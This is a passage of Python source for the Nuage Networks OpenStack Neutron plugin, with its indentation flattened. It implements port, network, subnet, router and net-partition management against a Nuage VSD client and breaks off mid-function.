from oslo.config import cfg
from sqlalchemy.orm import exc
from neutron.api import extensions as neutron_extensions
from neutron.api.v2 import attributes
from neutron.common import constants as os_constants
from neutron.common import exceptions as n_exc
from neutron.common import utils
from neutron.db import api as db
from neutron.db import db_base_plugin_v2
from neutron.db import external_net_db
from neutron.db import extraroute_db
from neutron.db import l3_db
from neutron.db import quota_db # noqa
from neutron.db import securitygroups_db as sg_db
from neutron.extensions import external_net
from neutron.extensions import l3
from neutron.extensions import portbindings
from neutron.extensions import providernet as pnet
from neutron.extensions import securitygroup as ext_sg
from neutron.openstack.common import excutils
from neutron.openstack.common import importutils
from neutron.openstack.common import lockutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import loopingcall
from neutron.plugins.nuage.common import config
from neutron.plugins.nuage.common import constants
from neutron.plugins.nuage.common import exceptions as nuage_exc
from neutron.plugins.nuage import extensions
from neutron.plugins.nuage.extensions import netpartition
from neutron.plugins.nuage import nuagedb
from neutron.plugins.nuage import syncmanager
from neutron import policy
LOG = logging.getLogger(__name__)
class NuagePlugin(db_base_plugin_v2.NeutronDbPluginV2,
external_net_db.External_net_db_mixin,
extraroute_db.ExtraRoute_db_mixin,
l3_db.L3_NAT_db_mixin,
netpartition.NetPartitionPluginBase,
sg_db.SecurityGroupDbMixin):
"""Class that implements Nuage Networks' plugin functionality."""
supported_extension_aliases = ["router", "binding", "external-net",
"net-partition", "nuage-router",
"nuage-subnet", "quotas", "provider",
"extraroute", "security-group"]
binding_view = "extension:port_binding:view"
def __init__(self):
super(NuagePlugin, self).__init__()
neutron_extensions.append_api_extensions_path(extensions.__path__)
config.nuage_register_cfg_opts()
self.nuageclient_init()
net_partition = cfg.CONF.RESTPROXY.default_net_partition_name
self._create_default_net_partition(net_partition)
if cfg.CONF.SYNCMANAGER.enable_sync:
self.syncmanager = syncmanager.SyncManager(self.nuageclient)
self._synchronization_thread()
def nuageclient_init(self):
server = cfg.CONF.RESTPROXY.server
serverauth = cfg.CONF.RESTPROXY.serverauth
serverssl = cfg.CONF.RESTPROXY.serverssl
base_uri = cfg.CONF.RESTPROXY.base_uri
auth_resource = cfg.CONF.RESTPROXY.auth_resource
organization = cfg.CONF.RESTPROXY.organization
nuageclient = importutils.import_module('nuagenetlib.nuageclient')
self.nuageclient = nuageclient.NuageClient(server, base_uri,
serverssl, serverauth,
auth_resource,
organization)
def _synchronization_thread(self):
sync_interval = cfg.CONF.SYNCMANAGER.sync_interval
fip_quota = str(cfg.CONF.RESTPROXY.default_floatingip_quota)
if sync_interval > 0:
sync_loop = loopingcall.FixedIntervalLoopingCall(
self.syncmanager.synchronize, fip_quota)
sync_loop.start(interval=sync_interval)
else:
self.syncmanager.synchronize(fip_quota)
def _resource_finder(self, context, for_resource, resource, user_req):
match = re.match(attributes.UUID_PATTERN, user_req[resource])
if match:
obj_lister = getattr(self, "get_%s" % resource)
found_resource = obj_lister(context, user_req[resource])
if not found_resource:
msg = (_("%(resource)s with id %(resource_id)s does not "
"exist") % {'resource': resource,
'resource_id': user_req[resource]})
raise n_exc.BadRequest(resource=for_resource, msg=msg)
else:
filter = {'name': [user_req[resource]]}
obj_lister = getattr(self, "get_%ss" % resource)
found_resource = obj_lister(context, filters=filter)
if not found_resource:
msg = (_("Either %(resource)s %(req_resource)s not found "
"or you dont have credential to access it")
% {'resource': resource,
'req_resource': user_req[resource]})
raise n_exc.BadRequest(resource=for_resource, msg=msg)
if len(found_resource) > 1:
msg = (_("More than one entry found for %(resource)s "
"%(req_resource)s. Use id instead")
% {'resource': resource,
'req_resource': user_req[resource]})
raise n_exc.BadRequest(resource=for_resource, msg=msg)
found_resource = found_resource[0]
return found_resource
def _create_update_port(self, context, port, np_name):
filters = {'device_id': [port['device_id']]}
ports = self.get_ports(context, filters)
params = {
'port_id': port['id'],
'id': port['device_id'],
'mac': port['mac_address'],
'netpart_name': np_name,
'ip': port['fixed_ips'][0]['ip_address'],
'no_of_ports': len(ports),
'tenant': port['tenant_id'],
'neutron_id': port['fixed_ips'][0]['subnet_id']
}
self.nuageclient.create_vms(params)
def _get_router_by_subnet(self, context, subnet_id):
filters = {
'fixed_ips': {'subnet_id': [subnet_id]},
'device_owner': [os_constants.DEVICE_OWNER_ROUTER_INTF]
}
router_port = self.get_ports(context, filters=filters)
if not router_port:
msg = (_("Router for subnet %s not found ") % subnet_id)
raise n_exc.BadRequest(resource='port', msg=msg)
return router_port[0]['device_id']
def _process_port_create_security_group(self, context, port,
sec_group):
if not attributes.is_attr_set(sec_group):
port[ext_sg.SECURITYGROUPS] = []
return
port_id = port['id']
with context.session.begin(subtransactions=True):
for sg_id in sec_group:
super(NuagePlugin,
self)._create_port_security_group_binding(context,
port_id,
sg_id)
try:
vptag_vport_list = []
for sg_id in sec_group:
params = {
'neutron_port_id': port_id
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if nuage_port and nuage_port.get('nuage_vport_id'):
nuage_vport_id = nuage_port['nuage_vport_id']
sg = self._get_security_group(context, sg_id)
sg_rules = self.get_security_group_rules(
context,
{'security_group_id': [sg_id]})
sg_params = {
'nuage_port': nuage_port,
'sg': sg,
'sg_rules': sg_rules
}
nuage_vptag_id = (
self.nuageclient.process_port_create_security_group(
sg_params))
vptag_vport = {
'nuage_vporttag_id': nuage_vptag_id
}
vptag_vport_list.append(vptag_vport)
if vptag_vport_list:
params = {
'vptag_vport_list': vptag_vport_list,
'nuage_vport_id': nuage_vport_id
}
self.nuageclient.update_nuage_vport(params)
except Exception:
with excutils.save_and_reraise_exception():
for sg_id in sec_group:
super(NuagePlugin,
self)._delete_port_security_group_bindings(context,
port_id)
# Convert to list as a set might be passed here and
# this has to be serialized
port[ext_sg.SECURITYGROUPS] = (list(sec_group) if sec_group else [])
def _delete_port_security_group_bindings(self, context, port_id):
super(NuagePlugin,
self)._delete_port_security_group_bindings(context, port_id)
self.nuageclient.delete_port_security_group_bindings(port_id)
@lockutils.synchronized('create_port', 'nuage-port', external=True)
def create_port(self, context, port):
session = context.session
with session.begin(subtransactions=True):
p = port['port']
self._ensure_default_security_group_on_port(context, port)
port = super(NuagePlugin, self).create_port(context, port)
device_owner = port.get('device_owner', None)
if device_owner not in constants.AUTO_CREATE_PORT_OWNERS:
if 'fixed_ips' not in port or len(port['fixed_ips']) == 0:
return self._extend_port_dict_binding(context, port)
subnet_id = port['fixed_ips'][0]['subnet_id']
subnet_mapping = nuagedb.get_subnet_l2dom_by_id(session,
subnet_id)
if subnet_mapping:
port_prefix = constants.NOVA_PORT_OWNER_PREF
if port['device_owner'].startswith(port_prefix):
#This request is coming from nova
try:
net_partition = nuagedb.get_net_partition_by_id(
session,
subnet_mapping['net_partition_id'])
self._create_update_port(
context,
port,
net_partition['name'])
except Exception:
with excutils.save_and_reraise_exception():
super(NuagePlugin, self).delete_port(
context,
port['id'])
if ext_sg.SECURITYGROUPS in p:
self._process_port_create_security_group(
context,
port,
p[ext_sg.SECURITYGROUPS])
return self._extend_port_dict_binding(context, port)
def update_port(self, context, id, port):
p = port['port']
sg_groups = None
if p.get('device_owner', '').startswith(
constants.NOVA_PORT_OWNER_PREF):
session = context.session
with session.begin(subtransactions=True):
port = self._get_port(context, id)
port.update(p)
if not port.get('fixed_ips'):
return self._make_port_dict(port)
subnet_id = port['fixed_ips'][0]['subnet_id']
subnet_mapping = nuagedb.get_subnet_l2dom_by_id(session,
subnet_id)
if not subnet_mapping:
msg = (_("Subnet %s not found on VSD") % subnet_id)
raise n_exc.BadRequest(resource='port', msg=msg)
params = {
'neutron_port_id': id,
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if not nuage_port or not nuage_port.get('nuage_vport_id'):
net_partition = nuagedb.get_net_partition_by_id(
session, subnet_mapping['net_partition_id'])
self._create_update_port(context, port,
net_partition['name'])
self._check_floatingip_update(context, port)
updated_port = self._make_port_dict(port)
sg_port = self._extend_port_dict_security_group(
updated_port,
port
)
sg_groups = sg_port[ext_sg.SECURITYGROUPS]
else:
updated_port = super(NuagePlugin, self).update_port(context, id,
port)
if not updated_port.get('fixed_ips'):
return updated_port
subnet_id = updated_port['fixed_ips'][0]['subnet_id']
subnet_mapping = nuagedb.get_subnet_l2dom_by_id(context.session,
subnet_id)
if subnet_mapping:
if sg_groups:
self._delete_port_security_group_bindings(context,
updated_port['id'])
self._process_port_create_security_group(context,
updated_port,
sg_groups)
elif ext_sg.SECURITYGROUPS in p:
self._delete_port_security_group_bindings(context,
updated_port['id'])
self._process_port_create_security_group(
context,
updated_port,
p[ext_sg.SECURITYGROUPS]
)
return updated_port
def _delete_nuage_vport(self, context, port, np_name):
nuage_vif_id = None
params = {
'neutron_port_id': port['id'],
}
nuage_port = self.nuageclient.get_nuage_port_by_id(params)
if constants.NOVA_PORT_OWNER_PREF in port['device_owner']:
# This was a VM Port
if nuage_port:
nuage_vif_id = nuage_port['nuage_vif_id']
filters = {'device_id': [port['device_id']]}
ports = self.get_ports(context, filters)
params = {
'no_of_ports': len(ports),
'netpart_name': np_name,
'tenant': port['tenant_id'],
'mac': port['mac_address'],
'nuage_vif_id': nuage_vif_id,
'id': port['device_id']
}
self.nuageclient.delete_vms(params)
@lockutils.synchronized('delete-port', 'nuage-del', external=True)
def delete_port(self, context, id, l3_port_check=True):
if l3_port_check:
self.prevent_l3_port_deletion(context, id)
port = self._get_port(context, id)
# This is required for to pass ut test_floatingip_port_delete
self.disassociate_floatingips(context, id)
if not port['fixed_ips']:
return super(NuagePlugin, self).delete_port(context, id)
sub_id = port['fixed_ips'][0]['subnet_id']
subnet_mapping = nuagedb.get_subnet_l2dom_by_id(context.session,
sub_id)
if not subnet_mapping:
return super(NuagePlugin, self).delete_port(context, id)
# Need to call this explicitly to delete vport to vporttag binding
if ext_sg.SECURITYGROUPS in port:
self._delete_port_security_group_bindings(context, id)
netpart_id = subnet_mapping['net_partition_id']
net_partition = nuagedb.get_net_partition_by_id(context.session,
netpart_id)
self._delete_nuage_vport(context, port, net_partition['name'])
super(NuagePlugin, self).delete_port(context, id)
def _check_view_auth(self, context, resource, action):
return policy.check(context, action, resource)
def _extend_port_dict_binding(self, context, port):
if self._check_view_auth(context, port, self.binding_view):
port[portbindings.VIF_TYPE] = portbindings.VIF_TYPE_OVS
port[portbindings.VIF_DETAILS] = {
portbindings.CAP_PORT_FILTER: False
}
return port
def get_port(self, context, id, fields=None):
port = super(NuagePlugin, self).get_port(context, id, fields)
return self._fields(self._extend_port_dict_binding(context, port),
fields)
def get_ports(self, context, filters=None, fields=None):
ports = super(NuagePlugin, self).get_ports(context, filters, fields)
return [self._fields(self._extend_port_dict_binding(context, port),
fields) for port in ports]
def _check_router_subnet_for_tenant(self, context, tenant_id):
# Search router and subnet tables.
# If no entry left delete user and group from VSD
filters = {'tenant_id': [tenant_id]}
routers = self.get_routers(context, filters=filters)
subnets = self.get_subnets(context, filters=filters)
return bool(routers or subnets)
def _extend_network_dict_provider(self, context, network):
binding = nuagedb.get_network_binding(context.session, network['id'])
if binding:
network[pnet.NETWORK_TYPE] = binding.network_type
network[pnet.PHYSICAL_NETWORK] = binding.physical_network
network[pnet.SEGMENTATION_ID] = binding.vlan_id
def _process_provider_create(self, context, attrs):
network_type = attrs.get(pnet.NETWORK_TYPE)
physical_network = attrs.get(pnet.PHYSICAL_NETWORK)
segmentation_id = attrs.get(pnet.SEGMENTATION_ID)
network_type_set = attributes.is_attr_set(network_type)
physical_network_set = attributes.is_attr_set(physical_network)
segmentation_id_set = attributes.is_attr_set(segmentation_id)
if not (network_type_set or physical_network_set or
segmentation_id_set):
return None, None, None
if not network_type_set:
msg = _("provider:network_type required")
raise n_exc.InvalidInput(error_message=msg)
elif network_type != 'vlan':
msg = (_("provider:network_type %s not supported in VSP")
% network_type)
raise nuage_exc.NuageBadRequest(msg=msg)
if not physical_network_set:
msg = _("provider:physical_network required")
raise nuage_exc.NuageBadRequest(msg=msg)
if not segmentation_id_set:
msg = _("provider:segmentation_id required")
raise nuage_exc.NuageBadRequest(msg=msg)
self.nuageclient.validate_provider_network(network_type,
physical_network,
segmentation_id)
return network_type, physical_network, segmentation_id
def create_network(self, context, network):
(network_type, physical_network,
vlan_id) = self._process_provider_create(context,
network['network'])
with context.session.begin(subtransactions=True):
self._ensure_default_security_group(
context,
network['network']['tenant_id']
)
net = super(NuagePlugin, self).create_network(context,
network)
self._process_l3_create(context, net, network['network'])
if network_type == 'vlan':
nuagedb.add_network_binding(context.session, net['id'],
network_type,
physical_network, vlan_id)
self._extend_network_dict_provider(context, net)
return net
def _validate_update_network(self, context, id, network):
req_data = network['network']
is_external_set = req_data.get(external_net.EXTERNAL)
if not attributes.is_attr_set(is_external_set):
return (None, None)
neutron_net = self.get_network(context, id)
if neutron_net.get(external_net.EXTERNAL) == is_external_set:
return (None, None)
subnet = self._validate_nuage_sharedresource(context, 'network', id)
if subnet and not is_external_set:
msg = _('External network with subnets can not be '
'changed to non-external network')
raise nuage_exc.OperationNotSupported(msg=msg)
if is_external_set:
# Check if there are vm ports attached to this network
# If there are, then updating the network is not allowed
ports = self.get_ports(context, filters={'network_id': [id]})
for p in ports:
if p['device_owner'].startswith(
constants.NOVA_PORT_OWNER_PREF):
raise n_exc.NetworkInUse(net_id=id)
return (is_external_set, subnet)
def get_network(self, context, net_id, fields=None):
net = super(NuagePlugin, self).get_network(context,
net_id,
None)
self._extend_network_dict_provider(context, net)
return self._fields(net, fields)
def get_networks(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None, page_reverse=False):
nets = super(NuagePlugin,
self).get_networks(context, filters, None, sorts,
limit, marker, page_reverse)
for net in nets:
self._extend_network_dict_provider(context, net)
return [self._fields(net, fields) for net in nets]
def update_network(self, context, id, network):
pnet._raise_if_updates_provider_attributes(network['network'])
with context.session.begin(subtransactions=True):
is_external_set, subnet = self._validate_update_network(context,
id,
network)
net = super(NuagePlugin, self).update_network(context, id,
network)
self._process_l3_update(context, net, network['network'])
if subnet and is_external_set:
subn = subnet[0]
subnet_l2dom = nuagedb.get_subnet_l2dom_by_id(context.session,
subn['id'])
if subnet_l2dom:
user_id = subnet_l2dom['nuage_user_id']
group_id = subnet_l2dom['nuage_group_id']
self.nuageclient.delete_subnet(subn['id'])
nuagedb.delete_subnetl2dom_mapping(context.session,
subnet_l2dom)
if not self._check_router_subnet_for_tenant(
context, subn['tenant_id']):
self.nuageclient.delete_user(user_id)
self.nuageclient.delete_group(group_id)
self._add_nuage_sharedresource(subnet[0],
id,
constants.SR_TYPE_FLOATING)
return net
def delete_network(self, context, id):
with context.session.begin(subtransactions=True):
self._process_l3_delete(context, id)
filter = {'network_id': [id]}
subnets = self.get_subnets(context, filters=filter)
for subnet in subnets:
self.delete_subnet(context, subnet['id'])
super(NuagePlugin, self).delete_network(context, id)
def _get_net_partition_for_subnet(self, context, subnet):
ent = subnet.get('net_partition', None)
if not ent:
def_net_part = cfg.CONF.RESTPROXY.default_net_partition_name
net_partition = nuagedb.get_net_partition_by_name(context.session,
def_net_part)
else:
net_partition = self._resource_finder(context, 'subnet',
'net_partition', subnet)
if not net_partition:
msg = _('Either net_partition is not provided with subnet OR '
'default net_partition is not created at the start')
raise n_exc.BadRequest(resource='subnet', msg=msg)
return net_partition
@staticmethod
def _validate_create_subnet(subnet):
if (attributes.is_attr_set(subnet['gateway_ip'])
and netaddr.IPAddress(subnet['gateway_ip'])
not in netaddr.IPNetwork(subnet['cidr'])):
msg = "Gateway IP outside of the subnet CIDR "
raise nuage_exc.NuageBadRequest(msg=msg)
def _validate_create_provider_subnet(self, context, net_id):
net_filter = {'network_id': [net_id]}
existing_subn = self.get_subnets(context, filters=net_filter)
if len(existing_subn) > 0:
msg = _('Only one subnet is allowed per '
'Provider network %s') % net_id
raise nuage_exc.OperationNotSupported(msg=msg)
def _delete_nuage_sharedresource(self, net_id):
self.nuageclient.delete_nuage_sharedresource(net_id)
def _validate_nuage_sharedresource(self, context, resource, net_id):
filter = {'network_id': [net_id]}
existing_subn = self.get_subnets(context, filters=filter)
if len(existing_subn) > 1:
msg = _('Only one subnet is allowed per '
'external network %s') % net_id
raise nuage_exc.OperationNotSupported(msg=msg)
return existing_subn
def _add_nuage_sharedresource(self, subnet, net_id, type):
net = netaddr.IPNetwork(subnet['cidr'])
params = {
'neutron_subnet': subnet,
'net': net,
'type': type,
'net_id': net_id
}
self.nuageclient.create_nuage_sharedresource(params)
def _create_nuage_sharedresource(self, context, subnet, type):
subn = subnet['subnet']
net_id = subn['network_id']
self._validate_nuage_sharedresource(context, 'subnet', net_id)
with context.session.begin(subtransactions=True):
subn = super(NuagePlugin, self).create_subnet(context, subnet)
self._add_nuage_sharedresource(subn, net_id, type)
return subn
def _create_port_gateway(self, context, subnet, gw_ip=None):
if gw_ip is not None:
fixed_ip = [{'ip_address': gw_ip, 'subnet_id': subnet['id']}]
else:
fixed_ip = [{'subnet_id': subnet['id']}]
port_dict = dict(port=dict(
name='',
device_id='',
admin_state_up=True,
network_id=subnet['network_id'],
tenant_id=subnet['tenant_id'],
fixed_ips=fixed_ip,
mac_address=attributes.ATTR_NOT_SPECIFIED,
device_owner=os_constants.DEVICE_OWNER_DHCP))
port = super(NuagePlugin, self).create_port(context, port_dict)
return port
def _delete_port_gateway(self, context, ports):
for port in ports:
super(NuagePlugin, self).delete_port(context, port['id'])
def _create_nuage_subnet(self, context, neutron_subnet, netpart_id,
l2dom_template_id, pnet_binding):
net = netaddr.IPNetwork(neutron_subnet['cidr'])
# list(net)[-1] is the broadcast
last_address = neutron_subnet['allocation_pools'][-1]['end']
gw_port = self._create_port_gateway(context, neutron_subnet,
last_address)
params = {
'netpart_id': netpart_id,
'tenant_id': neutron_subnet['tenant_id'],
'net': net,
'l2dom_tmplt_id': l2dom_template_id,
'pnet_binding': pnet_binding,
'dhcp_ip': gw_port['fixed_ips'][0]['ip_address']
}
try:
nuage_subnet = self.nuageclient.create_subnet(neutron_subnet,
params)
except Exception:
with excutils.save_and_reraise_exception():
self._delete_port_gateway(context, [gw_port])
super(NuagePlugin, self).delete_subnet(context,
neutron_subnet['id'])
if nuage_subnet:
l2dom_id = str(nuage_subnet['nuage_l2template_id'])
user_id = nuage_subnet['nuage_userid']
group_id = nuage_subnet['nuage_groupid']
id = nuage_subnet['nuage_l2domain_id']
with context.session.begin(subtransactions=True):
nuagedb.add_subnetl2dom_mapping(context.session,
neutron_subnet['id'],
id,
netpart_id,
l2dom_id=l2dom_id,
nuage_user_id=user_id,
nuage_group_id=group_id)
def create_subnet(self, context, subnet):
subn = subnet['subnet']
net_id = subn['network_id']
if self._network_is_external(context, net_id):
return self._create_nuage_sharedresource(
context, subnet, constants.SR_TYPE_FLOATING)
pnet_binding = nuagedb.get_network_binding(context.session, net_id)
if pnet_binding:
self._validate_create_provider_subnet(context, net_id)
self._validate_create_subnet(subn)
net_partition = self._get_net_partition_for_subnet(context, subn)
neutron_subnet = super(NuagePlugin, self).create_subnet(context,
subnet)
self._create_nuage_subnet(context, neutron_subnet, net_partition['id'],
subn['nuage_subnet_template'],
pnet_binding)
return neutron_subnet
def update_subnet(self, context, id, subnet):
subn = copy.deepcopy(subnet['subnet'])
subnet_l2dom = nuagedb.get_subnet_l2dom_by_id(context.session,
id)
params = {
'parent_id': subnet_l2dom['nuage_subnet_id'],
'type': subnet_l2dom['nuage_l2dom_tmplt_id']
}
with context.session.begin(subtransactions=True):
neutron_subnet = super(NuagePlugin, self).update_subnet(context,
id, subnet)
self.nuageclient.update_subnet(subn, params)
return neutron_subnet
def delete_subnet(self, context, id):
subnet = self.get_subnet(context, id)
if self._network_is_external(context, subnet['network_id']):
super(NuagePlugin, self).delete_subnet(context, id)
return self._delete_nuage_sharedresource(id)
subnet_l2dom = nuagedb.get_subnet_l2dom_by_id(context.session, id)
if subnet_l2dom:
try:
self.nuageclient.delete_subnet(id)
except Exception:
msg = (_('Unable to complete operation on subnet %s.'
'One or more ports have an IP allocation '
'from this subnet.') % id)
raise n_exc.BadRequest(resource='subnet', msg=msg)
super(NuagePlugin, self).delete_subnet(context, id)
if subnet_l2dom and not self._check_router_subnet_for_tenant(
context, subnet['tenant_id']):
self.nuageclient.delete_user(subnet_l2dom['nuage_user_id'])
self.nuageclient.delete_group(subnet_l2dom['nuage_group_id'])
def add_router_interface(self, context, router_id, interface_info):
session = context.session
with session.begin(subtransactions=True):
rtr_if_info = super(NuagePlugin,
self).add_router_interface(context,
router_id,
interface_info)
subnet_id = rtr_if_info['subnet_id']
subn = self.get_subnet(context, subnet_id)
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(session,
router_id)
nuage_zone = self.nuageclient.get_zone_by_routerid(router_id)
if not nuage_zone or not ent_rtr_mapping:
super(NuagePlugin,
self).remove_router_interface(context,
router_id,
interface_info)
msg = (_("Router %s does not hold default zone OR "
"domain in VSD. Router-IF add failed")
% router_id)
raise n_exc.BadRequest(resource='router', msg=msg)
subnet_l2dom = nuagedb.get_subnet_l2dom_by_id(session,
subnet_id)
if not subnet_l2dom:
super(NuagePlugin,
self).remove_router_interface(context,
router_id,
interface_info)
msg = (_("Subnet %s does not hold Nuage VSD reference. "
"Router-IF add failed") % subnet_id)
raise n_exc.BadRequest(resource='subnet', msg=msg)
if (subnet_l2dom['net_partition_id'] !=
ent_rtr_mapping['net_partition_id']):
super(NuagePlugin,
self).remove_router_interface(context,
router_id,
interface_info)
msg = (_("Subnet %(subnet)s and Router %(router)s belong to "
"different net_partition Router-IF add "
"not permitted") % {'subnet': subnet_id,
'router': router_id})
raise n_exc.BadRequest(resource='subnet', msg=msg)
nuage_subnet_id = subnet_l2dom['nuage_subnet_id']
if self.nuageclient.vms_on_l2domain(nuage_subnet_id):
super(NuagePlugin,
self).remove_router_interface(context,
router_id,
interface_info)
msg = (_("Subnet %s has one or more active VMs "
"Router-IF add not permitted") % subnet_id)
raise n_exc.BadRequest(resource='subnet', msg=msg)
self.nuageclient.delete_subnet(subnet_id)
net = netaddr.IPNetwork(subn['cidr'])
pnet_binding = nuagedb.get_network_binding(context.session,
subn['network_id'])
params = {
'net': net,
'zone_id': nuage_zone['nuage_zone_id'],
'neutron_subnet_id': subnet_id,
'pnet_binding': pnet_binding
}
if not attributes.is_attr_set(subn['gateway_ip']):
subn['gateway_ip'] = str(netaddr.IPAddress(net.first + 1))
try:
nuage_subnet = self.nuageclient.create_domain_subnet(subn,
params)
except Exception:
with excutils.save_and_reraise_exception():
super(NuagePlugin,
self).remove_router_interface(context,
router_id,
interface_info)
if nuage_subnet:
ns_dict = {}
ns_dict['nuage_subnet_id'] = nuage_subnet['nuage_subnetid']
ns_dict['nuage_l2dom_tmplt_id'] = None
nuagedb.update_subnetl2dom_mapping(subnet_l2dom,
ns_dict)
return rtr_if_info
def remove_router_interface(self, context, router_id, interface_info):
if 'subnet_id' in interface_info:
subnet_id = interface_info['subnet_id']
subnet = self.get_subnet(context, subnet_id)
found = False
try:
filters = {'device_id': [router_id],
'device_owner':
[os_constants.DEVICE_OWNER_ROUTER_INTF],
'network_id': [subnet['network_id']]}
ports = self.get_ports(context, filters)
for p in ports:
if p['fixed_ips'][0]['subnet_id'] == subnet_id:
found = True
break
except exc.NoResultFound:
msg = (_("No router interface found for Router %s. "
"Router-IF delete failed") % router_id)
raise n_exc.BadRequest(resource='router', msg=msg)
if not found:
msg = (_("No router interface found for Router %s. "
"Router-IF delete failed") % router_id)
raise n_exc.BadRequest(resource='router', msg=msg)
elif 'port_id' in interface_info:
port_db = self._get_port(context, interface_info['port_id'])
if not port_db:
msg = (_("No router interface found for Router %s. "
"Router-IF delete failed") % router_id)
raise n_exc.BadRequest(resource='router', msg=msg)
subnet_id = port_db['fixed_ips'][0]['subnet_id']
session = context.session
with session.begin(subtransactions=True):
subnet_l2dom = nuagedb.get_subnet_l2dom_by_id(session,
subnet_id)
if not subnet_l2dom:
return super(NuagePlugin,
self).remove_router_interface(context,
router_id,
interface_info)
nuage_subn_id = subnet_l2dom['nuage_subnet_id']
if self.nuageclient.vms_on_subnet(nuage_subn_id):
msg = (_("Subnet %s has one or more active VMs "
"Router-IF delete not permitted") % subnet_id)
raise n_exc.BadRequest(resource='subnet', msg=msg)
neutron_subnet = self.get_subnet(context, subnet_id)
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(
context.session,
router_id)
if not ent_rtr_mapping:
msg = (_("Router %s does not hold net_partition "
"assoc on Nuage VSD. Router-IF delete failed")
% router_id)
raise n_exc.BadRequest(resource='router', msg=msg)
net = netaddr.IPNetwork(neutron_subnet['cidr'])
netpart_id = ent_rtr_mapping['net_partition_id']
pnet_binding = nuagedb.get_network_binding(
context.session, neutron_subnet['network_id'])
params = {
'tenant_id': neutron_subnet['tenant_id'],
'net': net,
'netpart_id': netpart_id,
'nuage_subn_id': nuage_subn_id,
'neutron_subnet': neutron_subnet,
'pnet_binding': pnet_binding
}
nuage_subnet = self.nuageclient.remove_router_interface(params)
info = super(NuagePlugin,
self).remove_router_interface(context, router_id,
interface_info)
if nuage_subnet:
tmplt_id = str(nuage_subnet['nuage_l2template_id'])
ns_dict = {}
ns_dict['nuage_subnet_id'] = nuage_subnet['nuage_l2domain_id']
ns_dict['nuage_l2dom_tmplt_id'] = tmplt_id
nuagedb.update_subnetl2dom_mapping(subnet_l2dom,
ns_dict)
return info
def _get_net_partition_for_router(self, context, rtr):
ent = rtr.get('net_partition', None)
if not ent:
def_net_part = cfg.CONF.RESTPROXY.default_net_partition_name
net_partition = nuagedb.get_net_partition_by_name(context.session,
def_net_part)
else:
net_partition = self._resource_finder(context, 'router',
'net_partition', rtr)
if not net_partition:
msg = _("Either net_partition is not provided with router OR "
"default net_partition is not created at the start")
raise n_exc.BadRequest(resource='router', msg=msg)
return net_partition
def create_router(self, context, router):
net_partition = self._get_net_partition_for_router(context, router)
neutron_router = super(NuagePlugin, self).create_router(context,
router)
params = {
'net_partition': net_partition,
'tenant_id': neutron_router['tenant_id']
}
try:
nuage_router = self.nuageclient.create_router(neutron_router,
router['router'],
params)
except Exception:
with excutils.save_and_reraise_exception():
super(NuagePlugin, self).delete_router(context,
neutron_router['id'])
if nuage_router:
with context.session.begin(subtransactions=True):
nuagedb.add_entrouter_mapping(context.session,
net_partition['id'],
neutron_router['id'],
nuage_router['nuage_domain_id'])
return neutron_router
def _validate_nuage_staticroutes(self, old_routes, added, removed):
cidrs = []
for old in old_routes:
if old not in removed:
ip = netaddr.IPNetwork(old['destination'])
cidrs.append(ip)
for route in added:
ip = netaddr.IPNetwork(route['destination'])
matching = netaddr.all_matching_cidrs(ip.ip, cidrs)
if matching:
msg = _('for same subnet, multiple static routes not allowed')
raise n_exc.BadRequest(resource='router', msg=msg)
cidrs.append(ip)
def update_router(self, context, id, router):
r = router['router']
with context.session.begin(subtransactions=True):
if 'routes' in r:
old_routes = self._get_extra_routes_by_router_id(context,
id)
added, removed = utils.diff_list_of_dict(old_routes,
r['routes'])
self._validate_nuage_staticroutes(old_routes, added, removed)
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(
context.session, id)
if not ent_rtr_mapping:
msg = (_("Router %s does not hold net-partition "
"assoc on VSD. extra-route failed") % id)
raise n_exc.BadRequest(resource='router', msg=msg)
# Let it do internal checks first and verify it.
router_updated = super(NuagePlugin,
self).update_router(context,
id,
router)
for route in removed:
destaddr = route['destination']
cidr = destaddr.split('/')
params = {
"address": cidr[0],
"nexthop": route['nexthop'],
"nuage_domain_id": ent_rtr_mapping['nuage_router_id']
}
self.nuageclient.delete_nuage_staticroute(params)
for route in added:
params = {
'parent_id': ent_rtr_mapping['nuage_router_id'],
'net': netaddr.IPNetwork(route['destination']),
'nexthop': route['nexthop']
}
self.nuageclient.create_nuage_staticroute(
params)
else:
router_updated = super(NuagePlugin, self).update_router(
context, id, router)
return router_updated
def delete_router(self, context, id):
neutron_router = self.get_router(context, id)
session = context.session
ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(session,
id)
if ent_rtr_mapping:
filters = {
'device_id': [id],
'device_owner': [os_constants.DEVICE_OWNER_ROUTER_INTF]
}
ports = self.get_ports(context, filters)
if ports:
raise l3.RouterInUse(router_id=id)
nuage_domain_id = ent_rtr_mapping['nuage_router_id']
self.nuageclient.delete_router(nuage_domain_id)
super(NuagePlugin, self).delete_router(context, id)
nuage_zone = self.nuageclient.get_zone_by_routerid(id)
if nuage_zone and not self._check_router_subnet_for_tenant(
context, neutron_router['tenant_id']):
user_id, group_id = self.nuageclient.get_usergroup(
neutron_router['tenant_id'],
ent_rtr_mapping['net_partition_id'])
self.nuageclient.delete_user(user_id)
self.nuageclient.delete_group(group_id)
def _make_net_partition_dict(self, net_partition, fields=None):
res = {
'id': net_partition['id'],
'name': net_partition['name'],
'l3dom_tmplt_id': net_partition['l3dom_tmplt_id'],
'l2dom_tmplt_id': net_partition['l2dom_tmplt_id'],
}
return self._fields(res, fields)
def _create_net_partition(self, session, net_part_name):
fip_quota = cfg.CONF.RESTPROXY.default_floatingip_quota
params = {
"name": net_part_name,
"fp_quota": str(fip_quota)
}
nuage_net_partition = self.nuageclient.create_net_partition(params)
net_partitioninst = None
if nuage_net_partition:
nuage_entid = nuage_net_partition['nuage_entid']
l3dom_id = nuage_net_partition['l3dom_id']
l2dom_id = nuage_net_partition['l2dom_id']
with session.begin():
net_partitioninst = nuagedb.add_net_partition(session,
nuage_entid,
l3dom_id,
l2dom_id,
net_part_name)
if not net_partitioninst:
return {}
return self._make_net_partition_dict(net_partitioninst)
def _create_default_net_partition(self, default_net_part):
def_netpart = self.nuageclient.get_def_netpartition_data(
default_net_part)
session = db.get_session()
if def_netpart:
net_partition = nuagedb.get_net_partition_by_name(
session, default_net_part)
with session.begin(subtransactions=True):
